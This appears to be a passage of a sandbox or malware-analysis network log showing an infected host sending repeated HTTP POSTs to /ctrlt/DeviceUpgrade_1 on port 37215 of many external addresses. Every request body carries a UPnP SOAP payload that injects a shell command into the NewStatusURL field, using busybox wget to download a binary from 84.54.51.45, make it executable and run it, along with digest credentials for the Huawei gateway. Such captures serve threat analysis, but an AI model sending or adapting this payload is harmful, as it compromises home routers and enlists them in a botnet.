                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1679192.168.2.1533030197.81.79.25037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.461760044 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1680192.168.2.1558840197.108.95.21237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.461781025 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1681192.168.2.1560200197.160.4.8737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.461803913 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1682192.168.2.1558396197.75.148.4637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.461812019 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1683192.168.2.1550976197.50.47.20837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.461819887 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1684192.168.2.1545514197.102.113.7137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.461852074 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1685192.168.2.1558882197.10.40.23037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.461874962 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1686192.168.2.1550112197.239.9.137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.461885929 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1687192.168.2.1537760197.198.71.22937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.461890936 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1688192.168.2.1546120197.200.203.25037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.461919069 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 